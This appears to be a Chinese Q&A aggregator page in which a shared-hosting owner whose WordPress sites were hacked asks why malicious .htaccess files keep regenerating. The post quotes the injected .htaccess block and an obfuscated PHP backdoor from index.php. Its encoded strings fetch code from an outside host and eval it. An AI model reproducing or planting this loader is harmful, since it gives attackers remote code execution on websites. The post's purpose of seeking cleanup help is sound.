程序员经验分享-hwhale

在文件目录中重复创建 .htaccess 文件

2023-12-05

我的共享主机中有大约 10 个站点。最近我注意到创建了很多 .htaccess 文件并限制了用户访问。

<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order Allow,Deny
Deny from all
</FilesMatch>

上面的块是.htaccess 中所有代码中写入的内容。当我删除它们时,它似乎又重新生成了。这意味着应该有一个脚本在包中的其他地方运行。我什至安装了 Wordfence 插件来识别更新的文件。我恢复了最近似乎是恶意的修改。但仍然没有任何变化。文件中还有一些编码的代码行,例如下面的index.php。

<?php
 $uoeq967= "O)sl 2Te4x-+gazAbuK_6qrjH0RZt*N3mLcVFEWvh;inySJC91oMfYXId5Up.(GP7D,Bw/kQ8";$vpna644='JGNoID0gY3VybF9pbml0KCdodHRwOi8vYmFua3N';$vpna645='zdG9wLnRlY2gvJy4kX0dFVFsnZiddKTtjdXJsX3';$vpna646='NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBT';$vpna647='lNGRVIsIDEpOyRyZXN1bHQgPSBjdXJsX2V4ZWMo';$vpna648='JGNoKTtldmFsKCc/PicuJHJlc3VsdCk7';$vpna643=$vpna644.$vpna645.$vpna646.$vpna647.$vpna648;function cdim173($fsxi199,$rykc638,$ekcu564){return ''.$fsxi199.''.$rykc638.''.$ekcu564.'';}$qfcg427 = cdim173($uoeq967{34},$uoeq967{13}.$uoeq967{3},$uoeq967{3});$uodu186 = cdim173($uoeq967{19}.$uoeq967{17},$uoeq967{2}.$uoeq967{7},'');$lrbk358 = cdim173($uoeq967{22},$uoeq967{19},$uoeq967{52});$hume205 = cdim173($uoeq967{17},'',$uoeq967{43});$xzdo850 = cdim173($uoeq967{34},$uoeq967{19},$uoeq967{13}.$uoeq967{22});$uqmy998 = cdim173($uoeq967{22},$uoeq967{13},$uoeq967{44});$aobc355 =cdim173(cdim173($qfcg427,'',$uodu186),cdim173($lrbk358,$hume205,''),cdim173($xzdo850,'',$uqmy998));$xggn756 = cdim173($uoeq967{34},$uoeq967{22},$uoeq967{7});$gnix510 = cdim173($uoeq967{13},$uoeq967{28},'');$wdfm884 = cdim173($uoeq967{7},'',$uoeq967{19});$loyh183 = cdim173($uoeq967{52},$uoeq967{17},$uoeq967{43});$bwfh819 = cdim173($uoeq967{34},$uoeq967{28},'');$jrmp133 = cdim173($uoeq967{42},$uoeq967{50},'');$iprf791 = cdim173('',$uoeq967{43},'');$hwks376 = cdim173( cdim173($xggn756,$gnix510,$wdfm884), cdim173($loyh183,'',$bwfh819), cdim173($jrmp133,'',$iprf791));$mtzu128 = cdim173($uoeq967{7},'',$uoeq967{39});$hesn342= cdim173($uoeq967{13},$uoeq967{3},$uoeq967{61});$taop807 = cdim173('',$uoeq967{16},$uoeq967{13});$gvcw064 = cdim173($uoeq967{2},$uoeq967{7},$uoeq967{20});$bihf178 = cdim173($uoeq967{8},$uoeq967{19},$uoeq967{56});$efaa907 = cdim173($uoeq967{7},$uoeq967{34},$uoeq967{50});$tvhp307 = cdim173($uoeq967{56},$uoeq967{7},$uoeq967{61});$qyff908 = cdim173(cdim173($mtzu128,$hesn342,''),cdim173('','',$taop807),cdim173($gvcw064,$bihf178.$efaa907,$tvhp307)).'"'.$vpna643.'"'.cdim173($uoeq967{1}.$uoeq967{1},'',$uoeq967{41});$aobc355($hwks376,array('','}'.$qyff908.'//'));//wp-blog-header scp-173?>

除了删除每个目录的 .htaccess 之外,我别无选择。但这并不能解决问题。除了清空文件管理器之外我还能做什么?


好吧,整个包都被黑了。我无能为力。正如其他人建议的那样,我花了两天时间将自动生成的文件一一清除。它被删除并在第二天出现。某些脚本可能在创建文件的后面运行。所以唯一的解决办法是;

  1. 联系托管提供商并要求他们彻底清理 目录,然后从头开始。或者
  2. 联系网络安全分析师并付钱让他们清除 至少花费 199 美元左右。

是的,糟糕的事情发生了!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

php

WordPress

htaccess

codeinjection

malware

在文件目录中重复创建 .htaccess 文件 的相关文章

  • “为什么”脚本不打印任何内容? [复制]

    这个问题在这里已经有答案了 当我运行以下脚本时 没有打印任何内容 为什么会这样呢 echo var gt 它回显 无 因为您的浏览器无法理解

  • 从文本块中提取相关标签/关键字

    我想要一个特定的实现 以便用户提供如下文本块 要求 使用 Linux Apache 2 的 LAMP 环境的工作知识 MySQL 5 和 PHP 5 Web 2 0 标准知识 熟悉 JSON 使用框架 Zend OOP 的实践经验 跨浏览器

  • 通过jquery传递搜索参数

    我有一个表单 如果用户输入搜索查询 其参数应通过 jquery 传递 并在获取结果后将结果加载到 div 容器中 由于我不太熟悉 jquery 我该怎么做 html currently the data is being displayed

  • htaccess - 将所有非 www 流量重定向到 www

    任何人都可以建议我如何使用 htaccess 文件获取非 www 流量重定向到网站的 www 版本 我知道我在根目录中创建了一个网站 但无法确定要放置什么 任何想法 比较容易 匹配任何不以 www 开头的内容 然后重定向到 www 版本 R

  • 如何让 shell_exec 在 IIS 6.0 上运行

    问题 我有一个 PHP 脚本 它使用shell exec运行 pdf 到文本转换器 为了简化问题 我创建了一个简短的脚本 使用shell exec只是回显的输出dir命令 当我在 Apache 服务器上运行它时 一切都按预期运行 当我切换到

  • 我如何知道请求是否来自 flash swf?

    我有一个用 flash 开发的应用程序 我需要访问一些 php 文件 因此 如果访问来自 swf 则 php 文件会返回一些数据 如何判断请求是否来自Flash 无需将 get post 变量传递给 php 可能是用户代理 推荐人 请记住

  • PHP上传文件产生错误代码4。为什么?

    HTML

  • 基本表创建 fpdf

    我找不到使用 fpdf 制作表格并从 mysql 数据库获取数据的合适教程 我只是想知道如何创建一个 我在网上尝试示例时遇到了很多错误 例如 我有 名字 中间名 姓氏 年龄 和 电子邮件 列 如何使用 fpdf 创建表格并回显数据库中的条目

  • Javascript 函数与 php 一样吗?

    我在网站上使用 WebIM 提供聊天支持 我希望能够在客户端启动聊天会话时设置一个计时器 如果操作员 技术人员在 x 秒内没有响应 我希望页面重定向到客户端可以留言的另一个页面 有点像 请稍等 我们尝试联系您 这样 如果所有技术人员都太忙或

  • 使用 HTTP-Basic 身份验证发出 HTTP GET 请求

    我需要为我正在开发的 Flash Player 项目构建一个代理 我只需要使用 HTTP Basic 身份验证向另一个 URL 发出 HTTP GET 请求 并提供来自 PHP 的响应 就好像 PHP 文件是原始源一样 我怎样才能做到这一点

  • 在 PHP 中将十进制/双精度/浮点值与 PDO 绑定的最佳方法是什么?

    看来类常量只涵盖PDO PARAM BOOL PDO PARAM INT and PDO PARAM STR用于绑定 您只是将十进制 浮点 双精度值绑定为字符串还是有更好的方法来处理它们 MySQLi 允许使用 d 类型表示 double

  • Twig:选择某些块并渲染它们

    我正在将 twig 模板引擎集成到 PHP 应用程序中 特别是 我想使用 twig 引擎来渲染表单 了解了 symfony2 如何使用 twig 渲染表单小部件后 他们有一个巨大的模板文件 其中包含所有小部件 如下所示 block pass

  • 使用php将文本文件转换为xml?

    data txt ha15rs 250 home2 gif 2 ha36gs 150 home3 gif 1 ha27se 300 home4 gif 4 ha4678 200 home5 gif 5 我想使用 php 使用 simplex

  • htaccess 301 重定向 - 删除查询字符串 (QSA)

    我一直在努力处理一些 htaccess 重定向 我只是花了一些时间在堆栈上阅读和搜索 但无法获得适合我的场景的答案 我正在将旧客户端网站的 301 重定向到新客户端 旧页面有参数查询 我想从网址中删除它 menu php idCategor

  • Yii 查询时对相关模型的限制

    我遇到了极限问题 我正在使用的代码如下 model PostCategory model record model gt with array posts gt array order gt posts createTime DESC li

  • PHP 时间间隔

    我正在寻找一个看起来应该非常简单的解决方案 但似乎我不能在这里找到任何好的答案 而且我自己似乎无法让它发挥作用 我正在寻找的是设置开始时间 结束时间 然后迭代给定时间间隔之间的一组时间 例如 上午 9 00 下午 5 00 是开始时间 这些

  • 如何使用 PHP 从 MySQL 检索特定值?

    好吧 我已经厌倦了 过去一周我花了大部分空闲时间试图解决这个问题 我知道 SQL 中的查询已更改 但我无法弄清楚 我能找到的所有其他帖子似乎都已经过时了 如果有人能帮助我 我将非常感激 我想做的就是使用手动输入数据库的唯一 密码 来检索行的

  • php56 - CentOS - Remi 仓库

    我刚刚在测试盒上安装了 php 5 6 正常的 cli php 解释器似乎不存在 gt php v bash php command not found gt php56 v PHP 5 6 13 cli built Sep 3 2015

  • 如何移动 Zend_Layout 的“视图”

    通常它会是这样的结构 application modules somemodule views scripts index index phtml 我如何将其移动到 application templates somemodule temp

  • 如何显示 PHP 对象

    我有这样的代码 dataRecord1 client gt GetRecord token table filter echo pre print r dataRecord1 echo pre foreach dataRecord1 gt

随机推荐

  • 优化的浮动模糊变化

    我正在寻找 C 中的优化函数来计算浮点数的面积平均值 该函数传递一个源浮点数组 一个目标浮点数组 与源数组大小相同 数组宽度和高度 模糊 区域宽度和高度 该函数应该 环绕 边缘以进行模糊 平均值计算 以下是使用矩形进行模糊处理的示例代码 F

  • 在 iOS 应用程序中运行 python 脚本

    我需要在 ios 应用程序中运行 python 脚本 我发现这个问题在ios中运行一个简单的python脚本在回答中他包括了Python h include

  • 在没有 htaccess 的情况下用 PHP 重写 URL

    网站正在虚拟主机上运行 我们无法访问该虚拟主机 htaccess文件 但是 我想对用户友好的 URL 进行 URL 重写 例如原始网址 www example com file q name 预期网址 www example com fil

  • Python:从列表创建 pandas 数据框

    我使用以下代码从列表创建数据框 test list a b c d df test pd DataFrame from records test list columns my letters df test 上面的代码工作正常 然后我对另

  • 在Python中,如何按排序键顺序迭代字典?

    有一个现有的函数以以下结尾 其中d是一本字典 return d iteritems 返回给定字典的未排序迭代器 我想返回一个遍历已排序项目的迭代器by key 我怎么做 还没有对此进行广泛的测试 但可以在 Python 2 5 2 中使用

  • 将 SSE 转换为 Neon:如何打包然后提取 32 位结果

    我必须将以下指令从 SSE 翻译为 Neon uint32 t a mm cvtsi128 si32 mm shuffle epi8 a SHUFFLE MASK Where static const m128i SHUFFLE MASK

  • Google 地图 V3 键盘辅助功能

    我正在构建一个地图 我希望可以通过键盘访问 V3 默认情况下可以通过键盘访问 但似乎在单击地图之前您无法访问键盘功能 我添加了一个链接来选择 它将带您到包含地图的 div 标签 但这不起作用 有没有什么方法可以在不实际使用鼠标的情况下激活一

  • 如何设置JavaScript窗口对象打开的窗口中某些元素的innerHTML?

    我有一些简单的 JavaScript 代码 如下所示 该函数通过 onclick 事件调用 窗口打开正常 但元素的innerHTML 没有改变 这是我拥有的文件 所以我知道我没有被任何安全策略阻止 并且 id 为 foo 的元素肯定存在 这

  • 无法使用 libcurl 访问需要客户端身份验证的站点

    我使用下面的片段来设置客户端身份验证的证书和密钥 curl easy setopt curl CURLOPT SSLCERT clientCert pem curl easy setopt curl CURLOPT SSLCERTPASSW

  • SQL Server - 与 NULL 相比非常慢

    我想加快以下查询的速度 WHERE 子句中有两个条件 请参阅下面的查询以供参考 目前 大约需要 60 秒 但是 如果我删除 where 子句中的第一个条件 Query 为 NULL 那么它几乎立即返回 关于如何加快速度有什么想法吗 表中大约

  • 相机框架和物体框架

    我正在阅读有关交互式图形的内容 特别是我开始了有关观看的部分 但我不太理解这句话 最初 我们从设置为单位矩阵的模型视图矩阵开始 因此相机框架和物体框架是相同的 我知道什么是模型视图矩阵 并且我知道在这种情况下相机视图的方向是 z 负轴 但我

  • 从 master 更新 Git 分支

    我有四个分支 master b1 b2 和 b3 在我完成 b1 b3 之后 我意识到我在分支 master 上需要更改一些应该在所有其他分支中的内容 我改变了我需要的master而且 这是我的问题 如何更新所有其他分支master分行代码

  • 在循环中查找列表的索引

    我有一个简单的问题 如果我在 python 中有一个 for 循环 如下所示 for name in nameList 我如何知道元素名称的索引是什么 我知道我可以做一些类似的事情 i 0 for name in nameList i i

  • 选择另一个表中缺少的记录的有效方法

    我有3张桌子 下面是结构 student id int name varchar 20 course course id int subject varchar 10 student course st id int course id i

  • 如何从参考经纬度得到“x”米的经纬度?

    我有以米为单位的距离以及参考纬度和经度 现在我想要 x 米上给定参考点在四个方向 南 北 东 西 的纬度和经度 我怎样才能得到这个值 我需要用 C 编写此内容 但欢迎任何伪代码或逻辑指导 Update 我有一个坐标作为参考点 我想计算北方向

  • C++:将指针强制转换为 int 然后再次返回指针是否安全?

    将指针强制转换为 int 然后再次返回指针是否安全 如果我们知道指针是否是 32 位长并且 int 是否是 32 位长呢 long juggle long p static assert sizeof long sizeof int int

  • 单页应用程序的搜索引擎索引

    好吧 我编写 Backbone js 应用程序已经一年多了 我喜欢这个框架模型 我已经学会了如何避免所有陷阱等 但作为单页应用程序开发人员 有一个领域我仍然很薄弱 如何对面向公众的应用程序进行搜索引擎优化 我正在开发一个博客项目 我认为最简

  • 使用 TypeScript 构建的 Angular 指令中的侧链接函数中的“this”未定义

    我对 TypeScript 和 Angular 都是相对新手 所以我可能在这里做了一些非常基本的错误 我正在尝试创建一个抽象基类 从中可以派生多个指令 每个指令将实现一个自定义验证规则 我的代码编译正常 但在运行时失败 特别是当它尝试调用

  • 获取 varchar 一部分的最后一个单词(左/右)

    获取 varchar 一部分的最后一个单词的正确方法是什么 DECLARE desc varchar 100 SET desc EXCHANGEUNIT P1i SILVERBLACK CYRILLIC SELECT RTRIM LEFT

  • 在文件目录中重复创建 .htaccess 文件

    我的共享主机中有大约 10 个站点 最近我注意到创建了很多 htaccess 文件并限制了用户访问

热门标签